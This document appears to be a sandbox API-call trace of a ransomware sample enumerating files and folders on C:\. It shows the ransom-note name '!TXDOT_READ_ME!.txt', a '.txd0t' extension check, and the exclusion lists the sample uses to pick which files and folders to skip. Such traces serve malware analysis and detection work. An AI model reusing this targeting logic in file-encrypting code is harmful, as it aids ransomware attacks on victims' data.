(psz1="System.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.734] PathFindExtensionW (pszPath="System.evtx") returned=".evtx" [0089.734] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.734] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.744] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.744] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\System.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\System.evtx") returned="\\\\?\\C:\\Logs\\System.evtx" [0089.744] SetEvent (hEvent=0x408) returned 1 [0089.744] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 1 [0089.744] StrCmpW (psz1="Windows PowerShell.evtx", psz2=".") returned 1 [0089.744] StrCmpW (psz1="Windows PowerShell.evtx", psz2="..") returned 1 [0089.744] StrCpyNW (in: psz1=0xed3e88, psz2="C:\\Logs", cchMax=1040 | out: psz1="C:\\Logs") returned="C:\\Logs" [0089.744] StrNCatW (in: psz1="C:\\Logs", psz2="\\", cchMax=1040 | out: psz1="C:\\Logs\\") returned="C:\\Logs\\" [0089.744] StrNCatW (in: psz1="C:\\Logs\\", psz2="Windows PowerShell.evtx", cchMax=1040 | out: psz1="C:\\Logs\\Windows PowerShell.evtx") returned="C:\\Logs\\Windows PowerShell.evtx" [0089.744] PathFindExtensionW (pszPath="Windows PowerShell.evtx") returned=".evtx" [0089.744] StrCmpW (psz1=".evtx", psz2=".txd0t") returned -1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="bootsect.bak") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="iconcache.db") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="thumbs.db") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2=" ransomware ") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2=" ransom ") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="debug.txt") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="boot.ini") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="desktop.ini") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="autorun.inf") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="ntuser.dat") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="ntldr") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="ntdetect.com") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="bootfont.bin") returned 1 [0089.744] StrCmpIW (psz1="Windows PowerShell.evtx", psz2="!TXDOT_READ_ME!.txt") returned 1 [0089.744] PathFindExtensionW (pszPath="Windows PowerShell.evtx") returned=".evtx" [0089.744] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".evtx") returned 0x0 [0089.744] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0089.784] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0089.784] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Logs\\Windows PowerShell.evtx", cchMax=32000 | out: psz1="\\\\?\\C:\\Logs\\Windows PowerShell.evtx") returned="\\\\?\\C:\\Logs\\Windows PowerShell.evtx" [0089.784] SetEvent (hEvent=0x408) returned 1 [0089.785] FindNextFileW (in: hFindFile=0xec20b0, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50555c8d, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50555c8d, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x4c0e48, dwReserved1=0x0, cFileName="Windows PowerShell.evtx", cAlternateFileName="WINDOW~1.EVT")) returned 0 [0089.785] FindClose (in: hFindFile=0xec20b0 | out: hFindFile=0xec20b0) returned 1 [0089.785] GetProcessHeap () returned 0xe30000 [0089.785] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3e88 | out: hHeap=0xe30000) returned 1 [0089.785] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6e97b025, ftCreationTime.dwHighDateTime=0x1d3275c, ftLastAccessTime.dwLowDateTime=0x6e97b025, ftLastAccessTime.dwHighDateTime=0x1d3275c, ftLastWriteTime.dwLowDateTime=0xaced8ceb, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x28000000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0089.785] StrCmpW (psz1="pagefile.sys", psz2=".") returned 1 [0089.785] StrCmpW (psz1="pagefile.sys", psz2="..") returned 1 [0089.785] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0089.785] StrCmpW (psz1="PerfLogs", psz2=".") returned 1 [0089.785] StrCmpW (psz1="PerfLogs", psz2="..") returned 1 [0089.785] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0089.785] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0089.785] StrNCatW (in: psz1="C:\\", psz2="PerfLogs", cchMax=1030 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system32\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\system\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\local\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\boot\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\perflogs\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\programdata\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\drivers\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\wsus\\") returned 0x0 [0089.785] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="crypt_detect") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="cryptolocker") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="ransomware") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\WINDOWS") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.786] StrStrIW (lpFirst="C:\\PerfLogs", lpSrch="C:\\Program Files") returned 0x0 [0089.786] GetProcessHeap () returned 0xe30000 [0089.786] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x498) returned 0xeda7a8 [0089.786] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\PerfLogs", cchMax=1048 | out: psz1="C:\\PerfLogs") returned="C:\\PerfLogs" [0089.786] StrNCatW (in: psz1="C:\\PerfLogs", psz2="\\*", cchMax=1048 | out: psz1="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0089.786] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2530 [0089.786] StrCmpW (psz1=".", psz2=".") returned 0 [0089.786] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.786] StrCmpW (psz1="..", psz2=".") returned 1 [0089.786] StrCmpW (psz1="..", psz2="..") returned 0 [0089.786] FindNextFileW (in: hFindFile=0xec2530, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xa03748ae, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17b3dd09, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650e21, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0089.786] FindClose (in: hFindFile=0xec2530 | out: hFindFile=0xec2530) returned 1 [0089.786] GetProcessHeap () returned 0xe30000 [0089.786] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeda7a8 | out: hHeap=0xe30000) returned 1 [0089.786] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17b3dd09, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xf0ddeecc, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xf0ddeecc, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0089.786] StrCmpW (psz1="Program Files", psz2=".") returned 1 [0089.786] StrCmpW (psz1="Program Files", psz2="..") returned 1 [0089.786] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0089.786] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0089.786] StrNCatW (in: psz1="C:\\", psz2="Program Files", cchMax=1030 | out: psz1="C:\\Program Files") returned="C:\\Program Files" [0089.786] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system32\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\system\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\local\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\boot\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\perflogs\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\programdata\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\drivers\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\wsus\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="crypt_detect") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="cryptolocker") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="ransomware") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\WINDOWS") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files", lpSrch="C:\\Program Files") returned="C:\\Program Files" [0089.787] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17bfc901, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xe7a165b3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe7a165b3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0089.787] StrCmpW (psz1="Program Files (x86)", psz2=".") returned 1 [0089.787] StrCmpW (psz1="Program Files (x86)", psz2="..") returned 1 [0089.787] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0089.787] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0089.787] StrNCatW (in: psz1="C:\\", psz2="Program Files (x86)", cchMax=1030 | out: psz1="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0089.787] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system32\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\system\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.787] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\local\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\boot\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\perflogs\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\programdata\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\drivers\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\wsus\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="crypt_detect") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="cryptolocker") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="ransomware") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\WINDOWS") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\Program Files (x86)", lpSrch="C:\\Program Files (x86)") returned="C:\\Program Files (x86)" [0089.788] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0089.788] StrCmpW (psz1="ProgramData", psz2=".") returned 1 [0089.788] StrCmpW (psz1="ProgramData", psz2="..") returned 1 [0089.788] StrCpyNW (in: psz1=0xed39f8, psz2="C:", cchMax=1030 | out: psz1="C:") returned="C:" [0089.788] StrNCatW (in: psz1="C:", psz2="\\", cchMax=1030 | out: psz1="C:\\") returned="C:\\" [0089.788] StrNCatW (in: psz1="C:\\", psz2="ProgramData", cchMax=1030 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system32\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\system\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\local\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\boot\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\perflogs\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\programdata\\") returned 0x0 [0089.788] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\drivers\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\wsus\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\efstmpwp\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch=":\\$recycle.bin\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="crypt_detect") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="cryptolocker") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="ransomware") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\WINDOWS") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files (x86)") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData", lpSrch="C:\\Program Files") returned 0x0 [0089.789] GetProcessHeap () returned 0xe30000 [0089.789] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x49e) returned 0xeda7a8 [0089.789] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.789] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\*", cchMax=1054 | out: psz1="C:\\ProgramData\\*") returned="C:\\ProgramData\\*" [0089.789] FindFirstFileW (in: lpFileName="C:\\ProgramData\\*", lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2770 [0089.789] StrCmpW (psz1=".", psz2=".") returned 0 [0089.789] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x450f4738, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x450f4738, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.789] StrCmpW (psz1="..", psz2=".") returned 1 [0089.789] StrCmpW (psz1="..", psz2="..") returned 0 [0089.789] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x450f4738, ftCreationTime.dwHighDateTime=0x1d327cd, ftLastAccessTime.dwLowDateTime=0x4511a9a6, ftLastAccessTime.dwHighDateTime=0x1d327cd, ftLastWriteTime.dwLowDateTime=0x4511a9a6, ftLastWriteTime.dwHighDateTime=0x1d327cd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440e1a, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0089.789] StrCmpW (psz1="Adobe", psz2=".") returned 1 [0089.789] StrCmpW (psz1="Adobe", psz2="..") returned 1 [0089.789] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.789] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.789] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Adobe", cchMax=1054 | out: psz1="C:\\ProgramData\\Adobe") returned="C:\\ProgramData\\Adobe" [0089.789] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system32\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\system\\") returned 0x0 [0089.789] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\local\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\boot\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\perflogs\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Adobe", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Adobe" [0089.790] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0089.790] StrCmpW (psz1="Application Data", psz2=".") returned 1 [0089.790] StrCmpW (psz1="Application Data", psz2="..") returned 1 [0089.790] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcb9c8f, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbcb1c5f2, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xcb9c8f, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0089.790] StrCmpW (psz1="Comms", psz2=".") returned 1 [0089.790] StrCmpW (psz1="Comms", psz2="..") returned 1 [0089.790] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.790] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.790] StrNCatW (in: 